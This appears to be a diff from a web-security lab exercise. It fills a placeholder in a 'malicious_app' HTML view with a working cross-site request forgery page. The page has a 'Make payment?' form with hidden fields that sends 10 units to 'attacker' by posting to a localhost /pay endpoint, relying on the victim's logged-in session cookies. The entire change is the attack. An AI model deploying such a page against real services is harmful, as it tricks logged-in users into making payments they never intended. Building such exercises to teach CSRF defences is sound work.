--- a/malicious_app/views/csrf.html
+++ b/malicious_app/views/csrf.html
@@ -2,5 +2,22 @@
 <html>
 
 <!-- Insert CSRF attack code here -->
+<!-- Must be logged in to victim account in browser (another tab is fine) so that cookies get passed -->
+<div class="payment-form">
+  <h3 class="payment-header">Make payment?</h3>
+  <form action="http://localhost:8080/pay" method="post">
+    <div class="form-group">
+      <div class="form-label">To:</div>
+      <div class="form-input"><input name="recipient" type="text" value="attacker" hidden=true /></div>
+    </div>
+    <div class="form-group">
+      <div class="form-label">Amount:</div>
+      <div class="form-input"><input name="amount" type="number" value=10 hidden=true/></div>
+    </div>
+    <input class="form-button" type="submit" value="Pay"/>
+  </form>
+
+  <!-- <div class="error"><p>{{ payment_error }}</p></div> -->
+</div>
 
 </html>
